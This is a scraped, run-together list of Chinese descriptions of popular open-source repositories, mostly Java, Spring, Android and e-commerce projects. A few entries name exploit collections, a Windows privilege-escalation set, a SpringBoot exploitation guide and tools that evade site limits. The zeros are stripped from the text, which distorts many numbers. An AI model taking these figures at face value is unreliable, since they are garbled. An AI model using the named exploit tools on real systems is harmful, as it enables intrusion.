包括人工智能 大数据类 并发编程 数据库类 数据挖掘 新面试题 架构设计 算法系列 计算机类 设计模式 软件测试 重构优化 等更多分类ADB Usage Complete ADB 用法大全二维码生成器 支持 gif 动态图片二维码 Vim 从入门到精通阿布量化交易系统 股票 期权 期货 比特币 机器学习 基于python的开源量化交易 量化投资架构一个简洁优雅的hexo主题 Wiki of OI ICPC for everyone 某大型游戏线上攻略 内含炫酷算术魔法 Google 开源项目风格指南 中文版 Git AWS Google 镜像 SS SSR VMESS节点行业研究报告的知识储备库 cim cross IM 适用于开发者的分布式即时通讯系统微信小程序开源项目库汇总每天更新 全网热门 BT Tracker 列表 天用Go动手写 从零实现系列强大的哔哩哔哩增强脚本 下载视频 音乐 封面 弹幕 简化直播间 评论区 首页 自定义顶栏 删除广告 夜间模式 触屏设备支持Evil Huawei 华为作过的恶Android上一个优雅 万能自定义UI 仿iOS 支持垂直 水平方向切换 支持周视图 自定义周起始 性能高效的日历控件 支持热插拔实现的UI定制 支持标记 自定义颜色 农历 自定义月视图各种显示模式等 Canvas绘制 速度快 占用内存低 你真的想不到日历居然还可以如此优雅已不再维护科学上网插件的离线安装包储存在这里ThinkPHP Framework 十年匠心的高性能PHP框架 Java 程序员眼中的 Linux 一个支持多选 选原图和视频的图片选择器 同时有预览 裁剪功能 支持hsweb haʊs wɛb 是一个基于spring boot 2 x开发 首个使用全响应式编程的企业级后台管理系统基础项目 学习强国 懒人刷分工具 自动学习wxParse 微信小程序富文本解析自定义组件 支持HTML及markdown解析 newbee mall 项目 新蜂商城 是一套电商系统 包括 newbee mall 商城系统及 newbee mall admin 商城后台管理系统 基于 Spring Boot 2 X 及相关技术栈开发 前台商城系统包含首页门户 商品分类 新品上线 首页轮播 商品推荐 商品搜索 商品展示 购物车 订单结算 订单流程 个人订单管理 会员中心 帮助中心等模块 后台管理系统包含数据面板 轮播图管理 商品管理 订单管理 会员管理 分类管理 设置等模块 最全的前端资源汇总仓库 包括前端学习 开发资源 求职面试等 中文翻译手写实现李航 统计学习方法 书中全部算法 Python 抖音机器人 论如何在抖音上找到漂亮小姐姐? ️A static blog writing client 一个静态博客写作客户端 超级速查表 编程语言 框架和开发工具的速查表 单个文件包含一切你需要知道的东西 迁移学习前端低代码框架 通过 JSON 配置就能生成各种页面 技术面试最后反问面试官的话Machine Learning Yearning 中文版 机器学习训练秘籍 Andrew Ng 著越来越多的网站具有反爬虫特性 有的用图片隐藏关键数据 有的使用反人类的验证码 建立反反爬虫的代码仓库 通过与不同特性的网站做斗争 无恶意 提高技术 欢迎提交难以采集的网站 因工作原因 项目暂停 本项目收藏这些年来看过或者听过的一些不错的常用的上千本书籍 没准你想找的书就在这里呢 包含了互联网行业大多数书籍和面试经验题目等等 有人工智能系列 常用深度学习框架TensorFlow pytorch keras NLP 机器学习 深度学习等等 大数据系列 Spark Hadoop Scala kafka等 程序员必修系列 C C java 数据结构 linux 设计模式 数据库等等 人人影视bot 完全对接人人影视全部无删减资源Spring Cloud基础教程 持续连载更新中一个用于在 macOS 上平滑你的鼠标滚动效果或单独设置滚动方向的小工具 让你的滚轮爽如触控板阿里妈妈前端团队出品的开源接口管理工具RAP第二代超轻量级中文ocr 支持竖排文字识别 支持ncnn mnn tnn推理总模型仅4 7M 微信全平台 SDK Senparc Weixin for C 支持 NET Framework 及 NET Core NET 6 已支持微信公众号 小程序 小游戏 企业号 企业微信 开放平台 微信支付 JSSDK 微信周边等全平台 WeChat SDK for C 中文独立博客列表高效率 QQ 机器人支持库支持定制任何播放器SDK和控制层 OpenPower工作组收集汇总的医院开放数据Xray 基于 Nginx 的 VLESS XTLS 一键安装脚本 FlutterDemo合集 今天你fu了吗莫烦Python 中文AI教学中国特色 TabBar 一行代码实现 Lottie 动画TabBar 支持中间带 号的TabBar样式 自带红点角标 支持动态刷新 Flutter豆瓣客户端 Awesome Flutter Project 全网最1 %还原豆瓣客户端 首页 书影音 小组 市集及个人中心 一个不拉 img xuvip top douyademo mp4 基于SpringCloud2 1的微服务开发脚手架 整合了等 服务治理方面引入等 让项目开发快速进入业务开发 而不需过多时间花费在架构搭建上 持续更新中基于 Vue2 和 ECharts 封装的图表组件 SSR 去广告ACL规则 SS完整GFWList规则 Clash规则碎片 Telegram频道订阅地址和我一步步部署 kubernetes 集群搜集 整理 维护实用规则 中文自然语言处理相关资料基于SOA架构的分布式电商购物商城 前后端分离 前台商城 全家桶 后台管理系统等What happens when 的中文翻译 原仓库QMUI iOS 致力于提高项目 UI 开发效率的解决方案新型冠状病毒防疫信息收集平台告别枯燥 致力于打造 Python 实用小例子在线制作 sorry 为所欲为 的gifNodejs学习笔记以及经验总结 公众号 程序猿小卡 李宏毅 机器学习 笔记 在线阅读地址 Vue js 源码分析V部落 Vue SpringBoot实现的多用户博客管理平台 Android Signature V2 Scheme签名下的新一代渠道包打包神器Autoscroll Banner 无限循环图片 文字轮播器 多种编程语言实现 LeetCode 剑指 Offer 第 2 版 程序员面试金典 第 6 版 题解一套高质量的微信小程序 UI 组件库飞桨 官方模型库 包含多种学术前沿和工业场景验证的深度学习模型 中文 Python 笔记专门为刚开始刷题的同学准备的算法基地 没有最细只有更细 立志用动画将晦涩难懂的算法说的通俗易懂 版入门实例代码 实战教程 是一个高性能且低损耗的 goroutine 池 CVPR 2 21 论文和开源项目合集有 有 Python进阶 Intermediate Python 中文版 机器人视觉 移动机器人 VS SLAM ORB SLAM2 深度学习目标检测 yolov3 行为检测 opencv PCL 机器学习 无人驾驶后台管理系统解决方案创建在线课程 学术简历或初创网站 Chrome插件开发全攻略 配套完整Demo 欢迎clone体验QUANTAXIS 支持任务调度 分布式部署的 股票 期货 期权 港股 虚拟货币 数据 回测 模拟 交易 可视化 多账户 纯本地量化解决方案微信调试 各种WebView样式调试 手机浏览器的页面真机调试 便捷的远程调试手机页面 抓包工具 支持 HTTPS 无需USB连接设备 rich text 富文本编辑器 汉字拼音 hàn zì pīn yīn面向开发人员梳理的代码安全指南以撸代码的形式学习Python提供同花顺客户端 国金 华泰客户端 雪球的基金 股票自动程序化交易以及自动打新 支持跟踪 joinquant ricequant 模拟交易 和 实盘雪球组合 量化交易组件搜狐视频 sohu tv Redis私有云平台spring boot打造文件文档在线预览项目计算机基础 计算机网络 操作系统 数据库 Git 面试问题全面总结 包含详细的follow up question以及答案 全部采用 问题 追问 答案 的形式 即拿即用 直击互联网大厂面试 可用于模拟面试 面试前复习 短期内快速备战面试 首款微信 macOS 客户端撤回拦截与多开windows kernel exploits Windows平台提权漏洞集合权限管理系统 预览地址 47 1 4 7 138 loginpkuseg多领域中文分词工具一款完善的安全评估工具 支持常见 web 安全问题扫描和自定义 poc 使用之前务必先阅读文档零反射全动态Android插件框架Python入门网络爬虫之精华版分布式配置管理平台 中文 iOS Mac 开发博客列表周志华 机器学习 又称西瓜书是一本较为全面的书籍 书中详细介绍了机器学习领域不同类型的算法 例如 监督学习 无监督学习 半监督学习 强化学习 集成降维 特征选择等 记录了本人在学习过程中的理解思路与扩展知识点 希望对新人阅读西瓜书有所帮助 国内首个Spring Cloud微服务化RBAC的管理平台 核心采用前端采用d2 admin中台框架 记得上边点个star 关注更新Apache ECharts incubating 的微信小程序版本C 资源大全中文版 标准库 Web应用框架 人工智能 数据库 图片处理 机器学习 日志 代码分析等 由 开源前哨 和 CPP开发者 微信公号团队维护更新 stackoverflow上Java相关回答整理翻译 基于Google Flutter的WanAndroid客户端 支持Android和iOS 包括BLoC RxDart 国际化 主题色 启动页 引导页 本代码库是作者小傅哥多年从事一线互联网 Java 开发的学习历程技术汇总 旨在为大家提供一个清晰详细的学习教程 侧重点更倾向编写Java核心内容 如果本仓库能为您提供帮助 请给予支持 关注 点赞 分享 C 资源大全中文版 包括了 构建系统 编译器 数据库 加密 初中高的教程 指南 书籍 库等 NET m3u8 downloader 开源的命令行m3u8 HLS dash下载器 支持普通AES 128 CBC解密 多线程 自定义请求头等 支持简体中文 繁体中文和英文 English Supported 国内低代码平台从业者交流tcc transaction是TCC型事务java实现设计模式 Golang实现 研磨设计模式 读书笔记Vue数据可视化组件库 类似阿里DataV 大屏数据展示 提供SVG的边框及装饰 图表 水位图 飞线图等组件 简单易用 长期更新 React版已发布 自己动手做聊天机器人教程 RecyclerView侧滑菜单 Item拖拽 滑动删除Item 自动加载更多 HeaderView FooterView Item分组黏贴 腾讯物联网终端操作系统一个小巧 轻量的浏览器内核 用来取代wke和libcef包含美颜等4 余种实时滤镜相机 可拍照 录像 图片修改springboot 框架与其它组件结合如等用深度学习对对联 技术面试必备基础知识 Leetcode 计算机操作系统 计算机网络 系统设计 Java学习 面试指南 一份涵盖大部分 Java 程序员所需要掌握的核心知识 准备 Java 面试 首选 JavaGuide 用动画的形式呈现解LeetCode题目的思路 互联网 Java 工程师进阶知识完全扫盲 涵盖高并发 分布式 高可用 微服务 海量数据处理等领域知识mall项目是一套电商系统 包括前台商城系统及后台管理系统 基于SpringBoot MyBatis实现 采用Docker容器化部署 前台商城系统包含首页门户 商品推荐 商品搜索 商品展示 购物车 订单流程 会员中心 客户服务 帮助中心等模块 后台管理系统包含商品管理 订单管理 会员管理 促销管理 运营管理 内容管理 统计报表 财务管理 权限管理 设置等模块 GitHub中文排行榜 帮助你发现高分优秀中文项目 更高效地吸收国人的优秀经验成果 榜单每周更新一次 敬请关注 算法面试 算法知识 针对小白的算法训练 还包括 1 阿里 字节 滴滴 百篇大厂面经汇总 2 千本开源电子书 3 百张思维导图 右侧来个 star 吧 English version supported 诊断利器Arthas教程 技术栈示例代码 快速简单上手教程 http下载工具 基于http代理 支持多连接分块下载阿里云计算平台团队出品 为监控而生的数据库连接池 企业级低代码平台 前后端分离架构强大的代码生成器让前后端代码一键生成 无需写任何代码 引领新的开发模式OnlineCoding 代码生成 手工MERGE 帮助Java项目解决7 %重复工作 让开发更关注业务 既能快速提高效率 帮助公司节省成本 同时又不失灵活性 下拉刷新 上拉加载 二级刷新 淘宝二楼智能下拉刷新框架 支持越界回弹 越界拖动 具有极强的扩展性 集成了几十种炫酷的Header和 Footer 该项目已成功集成 actuator 监控 admin 可视化监控 logback 日志 aopLog 通过AOP记录web请求日志 统一异常处理 json级别和页面级别 freemarker 模板引擎 thymeleaf 模板引擎 Beetl 模板引擎 Enjoy 模板引擎 JdbcTemplate 通用JDBC操作数据库 JPA 强大的ORM框架 mybatis 强大的ORM框架 通用Mapper 快速操作Mybatis PageHelper 通用的Mybatis分页插件 mybatis plus 快速操作Mybatis BeetlSQL 强大的ORM框架 u 微人事是一个前后端分离的人力资源管理系统 项目采用SpringBoot Vue开发 秒杀系统设计与实现 互联网工程师进阶与分析 To Be Top Javaer Java工程师成神之路循序渐进 学习博客Spring系列源码 mrbird cc快速 简单避免OOM的java处理Excel工具阿里巴巴 MySQL binlog 增量订阅 消费组件 一款优秀的开源博客发布应用 分布式任务调度平台XXL JOB 一款面向泛前端产品研发全生命周期的效率平台 面向云原生微服务的高可用流控防护组件 视频播放器支持弹幕 外挂字幕 支持滤镜 水印 gif截图 片头广告 中间广告 多个同时播放 支持基本的拖动 声音 亮度调节 支持边播边缓存 支持视频自带rotation的旋转 9 27 之类 重力旋转与手动旋转的同步支持 支持列表播放 列表全屏动画 视频加载速度 列表小窗口支持拖动 动画效果 调整比例 多分辨率切换 支持切换播放器 进度条小窗口预览 列表切换详情页面无缝播放 rtsp concat mpeg 又一个小商城 litemall Spring Boot后端 Vue管理员前端 微信小程序用户前端 Vue用户移动端基于Spring SpringMVC Mybatis分布式敏捷开发系统架构 提供整套公共微服务服务模块 集中权限管理 单点登录 内容管理 支付中心 用户管理 支持第三方登录 微信平台 存储系统 配置中心 日志分析 任务和通知等 支持服务治理 监控和追踪 努力为中小型企业打造全方位J2EE企业级开发解决方案 项目基于的前后端分离的后台管理系统 项目采用分模块开发方式 权限控制采用 RBAC 支持数据字典与数据权限管理 支持一键生成前后端代码 支持动态路由 史上最简单的Spring Cloud教程源码 CAT 作为服务端项目基础组件 提供了 Java C C Node js Python Go 等多语言客户端 已经在美团点评的基础架构中间件框架 MVC框架 RPC框架 数据库框架 缓存框架等 消息队列 配置系统等 深度集成 为美团点评各业务线提供系统丰富的性能指标 健康状况 实时告警等 spring boot 实践学习案例 是 spring boot 初学者及核心技术巩固的最佳实践 另外写博客 用 OpenWrite Spring Boot基础教程 Spring Boot 2 x版本连载中 帮助 Android App 进行组件化改造的路由框架 提高 Android UI 开发效率的 UI 库时间选择器 省市区三级联动 Luban 鲁班可能是最接近微信朋友圈的图片压缩算法 Gitee 最有价值开源项目 小而全而美的第三方登录开源组件 目前已支持Github Gitee 微博 钉钉 百度 Coding 腾讯云开发者平台 OSChina 支付宝 QQ 微信 淘宝 Google Facebook 抖音 领英 小米 微软 今日头条人人 华为 企业微信 酷家乐 Gitlab 美团 饿了么 推特 飞书 京东 阿里云 喜马拉雅 Amazon Slack和 Line 等第三方平台的授权登录 Login so easy 今日头条屏幕适配方案终极版 一个极低成本的 Android 屏幕适配方案 Banner 2 来了 Android广告图片轮播控件 内部基于ViewPager2实现 Indicator和UI都可以自定义 零代码 热更新 自动化 ORM 库 后端接口和文档零代码 前端 客户端 定制返回 JSON 的数据和结构一个涵盖六个专栏分布式消息队列 分布式事务的仓库 希望胖友小手一抖 右上角来个 Star 感恩 1 24Mybatis通用分页插件OkGo 3 震撼来袭 该库是基于 协议 封装了 OkHttp 的网络请求框架 比 Retrofit 更简单易用 支持 RxJava RxJava2 支持自定义缓存 支持批量断点下载管理和批量上传管理功能含 Flink 入门 概念 原理 实战 性能调优 源码解析等内容 涉及等内容的学习案例 还有 Flink 落地应用的大型项目案例 PVUV 日志存储 百亿数据实时去重 监控告警 分享 欢迎大家支持我的专栏 大数据实时计算引擎 Flink 实战与性能优化 安卓平台上的JavaScript自动化工具 ️一个整合了大量主流开源项目高度可配置化的 Android MVP 快速集成框架 Spring源码阅读大数据入门指南 android 4 4以上沉浸式状态栏和沉浸式导航栏管理 适配横竖屏切换 刘海屏 软键盘弹出等问题 可以修改状态栏字体颜色和导航栏图标颜色 以及不可修改字体颜色手机的适配 适用于一句代码轻松实现 以及对bar的其他设置 详见README 简书请参考 www jianshu com p 2a884e211a62业内为数不多致力于极致体验的超强全自研跨平台 windows android iOS 流媒体内核 通过模块化自由组合 支持实时RTMP推流 RTSP推流 RTMP播放器 RTSP播放器 录像 多路流媒体转发 音视频导播 动态视频合成 音频混音 直播互动 内置轻量级RTSP服务等 比快更快 业界真正靠谱的超低延迟直播SDK 1秒内 低延迟模式下2 4 ms DataX是阿里云DataWorks数据集成的开源版本 mall学习教程 架构 业务 技术要点全方位解析 mall项目 4 k star 是一套电商系统 使用现阶段主流技术实现 涵盖了等技术 采用Docker容器化部署 Android开源弹幕引擎 烈焰弹幕使 ~spring cloud vue oAuth2 全家桶实战 前后端分离模拟商城 完整的购物流程 后端运营平台 可以实现快速搭建企业级微服务项目 支持微信登录等三方登录 一个基于Spring Boot MyBatis的种子项目 用于快速构建中小型API RESTful API项目 强大 可定制 易扩展的 ViewPager 指示器框架 是的最佳替代品 支持角标 更支持在非ViewPager场景下使用 使用hide show 切换Fragment或使用se 27天成为Java大神安卓学习笔记 cim cross IM 适用于开发者的分布式即时通讯系统Android上一个优雅 万能自定义UI 仿iOS 支持垂直 水平方向切换 支持周视图 自定义周起始 性能高效的日历控件 支持热插拔实现的UI定制 支持标记 自定义颜色 农历 自定义月视图各种显示模式等 Canvas绘制 速度快 占用内存低 你真的想不到日历居然还可以如此优雅hsweb haʊs wɛb 是一个基于spring boot 2 x开发 首个使用全响应式编程的企业级后台管理系统基础项目 newbee mall 项目 新蜂商城 是一套电商系统 包括 newbee mall 商城系统及 newbee mall admin 商城后台管理系统 基于 Spring Boot 2 X 及相关技术栈开发 前台商城系统包含首页门户 商品分类 新品上线 首页轮播 商品推荐 商品搜索 商品展示 购物车 订单结算 订单流程 个人订单管理 会员中心 帮助中心等模块 后台管理系统包含数据面板 轮播图管理 商品管理 订单管理 会员管理 分类管理 设置等模块 mall swarm是一套微服务商城系统 采用了等核心技术 同时提供了基于Vue的管理后台方便快速搭建系统 mall swarm在电商业务的基础集成了注册中心 配置中心 监控中心 网关等系统功能 文档齐全 附带全套Spring Cloud教程 阅读是一款可以自定义来源阅读网络内容的工具 为广大网络文学爱好者提供一种方便 快捷舒适的试读体验 Spring Cloud基础教程 持续连载更新中阿里巴巴分布式数据库同步系统 解决中美异地机房 基于谷歌最新AAC架构 MVVM设计模式的一套快速开发库 整合OkRxJava Retrofit Glide等主流模块 满足日常开发需求 使用该框架可以快速开发一个高质量 易维护的Android应用 基于SpringCloud2 1的微服务开发脚手架 整合了等 服务治理方面引入等 让项目开发快速进入业务开发 而不需过多时间花费在架构搭建上 持续更新中基于SOA架构的分布式电商购物商城 前后端分离 前台商城 全家桶 后台管理系统等是 难得一见 的 Jetpack MVVM 最佳实践 在 以简驭繁 的代码中 对 视图控制器 乃至 标准化开发模式 形成正确 深入的理解 V部落 Vue SpringBoot实现的多用户博客管理平台 Android Signature V2 Scheme签名下的新一代渠道包打包神器即时通讯 IM 系统多种编程语言实现 LeetCode 剑指 Offer 第 2 版 程序员面试金典 第 6 版 题解专门为刚开始刷题的同学准备的算法基地 没有最细只有更细 立志用动画将晦涩难懂的算法说的通俗易懂 ansj分词 ict的真正java实现 分词效果速度都超过开源版的ict 中文分词 人名识别 词性标注 用户自定义词典 book 任阅 网络小说阅读器 3D翻页效果 txt pdf epub书籍阅读 Wifi传书 LeetCode刷题记录与面试整理mybatis generator界面工具 让你生成代码更简单更快捷Spring Cloud 学习案例 服务发现 服务治理 链路追踪 服务监控等 XPopup2 版本重磅来袭 2倍以上性能提升 带来可观的动画性能优化和交互细节的提升 功能强大 交互优雅 动画丝滑的通用弹窗 可以替代等组件 自带十几种效果良好的动画 支持完全的UI和动画自定义搜狐视频 sohu tv Redis私有云平台spring boot打造文件文档在线预览项目权限管理系统 预览地址 47 1 4 7 138 login零反射全动态Android插件框架分布式配置管理平台 通用 IM 聊天 UI 组件 已经同时支持 Android iOS RN 手把手教你整合最优雅SSM框架 SpringMVC Spring MyBatis换肤框架 极低的学习成本 极好的用户体验 一行 代码就可以实现换肤 你值得拥有 JVM 底层原理最全知识总结 国内首个Spring Cloud微服务化RBAC的管理平台 核心采用前端采用d2 admin中台框架 记得上边点个star 关注更新tcc transaction是TCC型事务java实现 RecyclerView侧滑菜单 Item拖拽 滑动删除Item 自动加载更多 HeaderView FooterView Item分组黏贴 包含美颜等4 余种实时滤镜相机 可拍照 录像 图片修改springboot 框架与其它组件结合如等安卓选择器类库 包括日期及时间选择器 可用于出生日期 营业时间等 单项选择器 可用于性别 民族 职业 学历 星座等 二三级联动选择器 可用于车牌号 基金定投日期等 城市地址选择器 分省级 地市级及区县级 数字选择器 可用于年龄 身高 体重 温度等 日历选日期择器 可用于酒店及机票预定日期 颜色选择器 文件及目录选择器等 Java工程师面试复习指南 本仓库涵盖大部分Java程序员所需要掌握的核心知识 整合了互联网上的很多优质Java技术文章 力求打造为最完整最实用的Java开发者学习指南 如果对你有帮助 给个star告诉我吧 谢谢 Android MVP 快速开发框架 做国内 示例最全面 注释最详细 使用最简单 代码最严谨 的 Android 开源 UI 框架几行代码快速集成二维码扫描功能MeterSphere 是一站式开源持续测试平台 涵盖测试跟踪 接口测试 性能测试 团队协作等功能 全面兼容 JMeter Postman Swagger 等开源 主流标准 记录各种学习笔记 算法 Java 数据库 并发 下一代Android打包工具 1 个渠道包只需要1 秒钟芋道 mall 商城 基于微服务的思想 构建在 B2C 电商场景下的项目实战 核心技术栈 是 Spring Boot Dubbo 未来 会重构成 Spring Cloud Alibaba Android 万能的等 支持多种Item类型的情况 lanproxy是一个将局域网个人电脑 服务器代理到公网的内网穿透工具 支持tcp流量转发 可支持任何tcp上层协议 访问内网网站 本地支付接口调试 ssh访问 远程桌面 目前市面上提供类似服务的有花生壳 TeamView GoToMyCloud等等 但要使用第三方的公网服务器就必须为第三方付费 并且这些服务都有各种各样的限制 此外 由于数据包会流经第三方 因此对数据安全也是一大隐患 技术交流QQ群 1 6742433 更优雅的驾车体验下载可以很简单 ️ 云阅 一款基于网易云音乐UI 使用玩架构开发的符合Google Material Design的Android客户端开源的 Material Design 豆瓣客户端一款针对系统PopupWindow优化的Popup库 功能强大 支持背景模糊 使用简单 你会爱上他的 PLDroidPlayer 是七牛推出的一款免费的适用于 Android 平台的播放器 SDK 采用全自研的跨平台播放内核 拥有丰富的功能和优异的性能 可高度定制化和二次开发 该项目已停止维护 9 Porn Android 客户端 突破游客每天观看1 次视频的限制 还可以下载视频 ️蓝绿 灰度 路由 限流 熔断 降级 隔离 追踪 流量染色 故障转移一本关于排序算法的 GitBook 在线书籍 十大经典排序算法 多语言实现 多种下拉刷新效果 上拉加载更多 可配置自定义头部广告位完全仿微信的图片选择 并且提供了多种图片加载接口 选择图片后可以旋转 可以裁剪成矩形或圆形 可以配置各种其他的参数SoloPi 自动化测试工具龙果支付系统 roncoo pay 是国内首款开源的互联网支付系统 拥有独立的账户体系 用户体系 支付接入体系 支付交易体系 对账清结算体系 目标是打造一款集成主流支付方式且轻量易用的支付收款系统 满足互联网业务系统打通支付通道实现支付收款和业务资金管理等功能 键盘面板冲突 布局闪动处理方案 咕泡学院实战项目 基于SpringBoot Dubbo构建的电商平台 微服务架构 商城 电商 微服务 高并发 kafka Elasticsearch停车场系统源码 停车场小程序 智能停车 Parking system 功能介绍 ①兼容市面上主流的多家相机 理论上兼容所有硬件 可灵活扩展 ②相机识别后数据自动上传到云端并记录 校验相机唯一id和硬件序列号 防止非法数据录入 ③用户手机查询停车记录详情可自主缴费 支持微信 支付宝 银行接口支付 支持每个停车场指定不同的商户进行收款 支付后出场在免费时间内会自动抬杆 ④支持app上查询附近停车场 导航 可用车位数 停车场费用 优惠券 评分 评论等 可预约车位 ⑤断电断网支持岗亭人员使用app可接管硬件进行停车记录的录入 技术架构 后端开发语言java 框架oauth2 spring 成长路线 但学到不仅仅是Java 业界首个支持渐进式组件化改造的Android组件化开源框架 支持跨进程调用SpringBoot2 从入门到实战 旨在打造在线最佳的 Java 学习笔记 含博客讲解和源码实例 包括 Java SE 和 Java WebJava诊断工具年薪百万互联网架构师课程文档及源码 公开部分 AndroidHttpCapture网络诊断工具 是一款Android手机抓包软件 主要功能包括 手机端抓包 PING DNS TraceRoute诊断 抓包HAR数据上传分享 你也可以看成是Android版的 Fiddler o 这可能是史上功能最全的Java权限认证框架 目前已集成 登录认证 权限认证 分布式Session会话 微服务网关鉴权 单点登录 OAuth2 踢人下线 Redis集成 前后台分离 记住我模式 模拟他人账号 临时身份切换 账号封禁 多账号认证体系 注解式鉴权 路由拦截式鉴权 花式token生成 自动续签 同端互斥登录 会话治理 密码加密 jwt集成 Spring集成 WebFlux集成 Android平台下的富文本解析器 支持Html和Markdown智能图片裁剪框架 自动识别边框 手动调节选区 使用透视变换裁剪并矫正选区 适用于身份证 名片 文档等照片的裁剪 俗名 可垂直跑 可水平跑的跑马灯 学名 可垂直翻 可水平翻的翻页公告 小马哥技术周报 Android Video Player 安卓视频播放器 封装模仿抖音并实现预加载 列表播放 悬浮播放 广告播放 弹幕 重学Java设计模式 是一本互联网真实案例实践书籍 以落地解决方案为核心 从实际业务中抽离出 交易 营销 秒杀 中间件 源码等22个真实场景 来学习设计模式的运用 欢迎关注小傅哥 微信 fustack 公众号 bugstack虫洞栈 博客 bugstack cnmybatis源码中文注释一款开源的GIF在线分享App 乐趣就要和世界分享 MPush开源实时消息推送系统在线云盘 网盘 OneDrive 云存储 私有云 对象存储 h5ai基于Spring Boot 2 x的一站式前后端分离快速开发平台XBoot 微信小程序 Uniapp 前端 Vue iView Admin 后端分布式限流 同步锁 验证码 SnowFlake雪花算法ID 动态权限 数据权限 工作流 代码生成 定时任务 社交账号 短信登录 单点登录 OAuth2开放平台 客服机器人 数据大屏 暗黑模式Guns基于SpringBoot 2 致力于做更简洁的后台管理系统 完美整合项目代码简洁 注释丰富 上手容易 同时Guns包含许多基础模块 用户管理 角色管理 部门管理 字典管理等1 个模块 可以直接作为一个后台管理系统的脚手架 Android 版本更新一个简洁而优雅的Android原生UI框架 解放你的双手 一套完整有效的android组件化方案 支持组件的组件完全隔离 单独调试 集成调试 组件交互 UI跳转 动态加载卸载等功能适用于Java和Android的快速 低内存占用的汉字转拼音库 Codes of my MOOC Course <我在慕课网上的课程 算法与数据结构 示例代码 包括C 和Java版本 课程的更多更新内容及辅助练习也将逐步添加进这个代码仓 Hope Boot 一款现代化的脚手架项目一个简单漂亮的SSM Spring SpringMVC Mybatis 博客系统根据Gson库使用的要求 将JSONObject格式的String 解析成实体B站 哔哩哔哩 Bilibili 自动签到投币工具 每天轻松获取65经验值 支持每日自动投币 银瓜子兑换硬币 领取大会员福利 大会员月底给自己充电等功能 呐 赶快和我一起成为Lv6吧 IJPay 让支付触手可及 封装了微信支付 QQ支付 支付宝支付 京东支付 银联支付 PayPal 支付等常用的支付方式以及各种常用的接口 不依赖任何第三方 mvc 框架 仅仅作为工具使用简单快速完成支付模块的开发 可轻松嵌入到任何系统里 右上角点下小星星 High quality pure Weex demo 网易严选 App 感受 Weex 开发Android 快速实现新手引导层的库 通过简洁链式调用 一行代码实现引导层的显示通过标签直接生成shape 无需再写shape xml 本库是一款基于RxJava2 Retrofit2实现简单易用的网络请求框架 结合android平台特性的网络封装库 采用api链式调用一点到底 集成cookie管理 多种缓存模式 极简https配置 上传下载进度显示 请求错误自动重试 请求携带token 时间戳 签名sign动态配置 自动登录成功后请求重发功能 3种层次的参数设置默认全局局部 默认标准ApiResult同时可以支持自定义的数据结构 已经能满足现在的大部分网络请求 Android BLE蓝牙通信库 基于Flink实现的商品实时推荐系统 flink统计商品热度 放入redis缓存 分析日志信息 将画像标签和实时记录放入Hbase 在用户发起推荐请求后 根据用户画像重排序热度榜 并结合协同过滤和标签两个推荐模块为新生成的榜单的每一个产品添加关联产品 最后返回新的用户列表 播放器基础库 专注于播放视图组件的高复用性和组件间的低耦合 轻松处理复杂业务 图片选择库 单选 多选 拍照 裁剪 压缩 自定义 包括视频选择和录制 DataX集成可视化页面 选择数据源即可一键生成数据同步任务 支持等数据源 批量创建RDBMS数据同步任务 集成开源调度系统 支持分布式 增量同步数据 实时查看运行日志 监控执行器资源 KILL运行进程 数据源信息加密等 Deprecated android 自定义日历控件 支持左右无限滑动 周月切换 标记日期显示 自定义显示效果跳转到指定日期一个通过动态加载本地皮肤包进行换肤的皮肤框架这是RedSpider社区成员原创与维护的Java多线程系列文章 一站式Apache Kafka集群指标监控与运维管控平台快速开发工具类收集 史上最全的开发工具类 欢迎Follow Fork Star后端技术总结 包括Java基础 JVM 数据库 mysql redis 计算机网络 算法 数据结构 操作系统 设计模式 系统设计 框架原理 最佳阅读地址Android源码设计模式分析项目可能是最好的支付SDK 停止维护 组件化综合案例 包含微信新闻 头条视频 美女图片 百度音乐 干活集中营 玩Android 豆瓣读书电影 知乎日报等等模块 架构模式 组件化阿里VLayout 腾讯X5 腾讯bugly 融合开发中需要的各种小案例 开源OA系统 码云GVP Java开源oa 企业OA办公平台 企业OA 协同办公OA 流程平台OA O2OA OA 支持国产麒麟操作系统和国产数据库 达梦 人大金仓 政务OA 军工信息化OA以Spring Cloud Netflix作为服务治理基础 展示基于tcc思想所实现的分布式事务解决方案一个帮助您完成从缩略视图到原视图无缝过渡转变的神奇框架 系统重构与迁移指南 手把手教你分析 评估现有系统 制定重构策略 探索可行重构方案 搭建测试防护网 进行系统架构重构 服务架构重构 模块重构 代码重构 数据库重构 重构后的架构守护版本检测升级 更新 库小说精品屋是一个多平台 web 安卓app 微信小程序 功能完善的屏幕自适应小说漫画连载系统 包含精品小说专区 轻小说专区和漫画专区 包括小说 漫画分类 小说 漫画搜索 小说 漫画排行 完本小说 漫画 小说 漫画评分 小说 漫画在线阅读 小说 漫画书架 小说 漫画阅读记录 小说下载 小说弹幕 小说 漫画自动采集 更新 纠错 小说内容自动分享到微博 邮件自动推广 链接自动推送到百度搜索引擎等功能 Android 徽章控件 致力于打造一款极致体验的 www wanandroid com 客户端 知识和美是可以并存的哦QAQn ≧ ≦ n 从源码层面 剖析挖掘互联网行业主流技术的底层实现原理 为广大开发者 “提升技术深度” 提供便利 目前开放 Spring 全家桶 Mybatis Netty Dubbo 框架 及 Redis Tomcat 中间件等Redis 一站式管理平台 支持集群的监控 安装 管理 告警以及基本的数据操作该项目不再维护 仅供学习参考专注批量推送的小而美的工具 目前支持 模板消息 公众号 模板消息 小程序 微信客服消息 微信企业号 企业微信消息 阿里云短信 阿里大于模板短信 腾讯云短信 云片网短信 E Mail HTTP请求 钉钉 华为云短信 百度云短信 又拍云短信 七牛云短信Android 平台开源天气 App 采用等开源库来实现 SpringBoot 相关漏洞学习资料 利用方法和技巧合集 黑盒安全评估 check listAndroid 权限请求框架 已适配 Android 11微信SDK JAVA 公众平台 开放平台 商户平台 服务商平台 QMQ是去哪儿网内部广泛使用的消息中间件 自2 12年诞生以来在去哪儿网所有业务场景中广泛的应用 包括跟交易息息相关的订单场景 也包括报价搜索等高吞吐量场景 Java 23种设计模式全归纳linux运维监控工具 支持系统信息 内存 cpu 温度 磁盘空间及IO 硬盘smart 系统负载 网络流量 进程等监控 API接口 大屏展示 拓扑图 端口监控 docker监控 日志文件监控 数据可视化 webSSH工具 堡垒机 跳板机 这可能是全网最好用的ViewPager轮播图 简单 高效 一行代码实现循环轮播 一屏三页任意变 指示器样式任你挑 一种简单有效的android组件化方案 支持组件的代码资源隔离 单独调试 集成调试 组件交互 UI跳转 生命周期等完整功能 一个强大 1 % 兼容 支持 AndroidX 支持 Kotlin并且灵活的组件化框架JPress 一个使用 Java 开发的建站神器 目前已经有 1 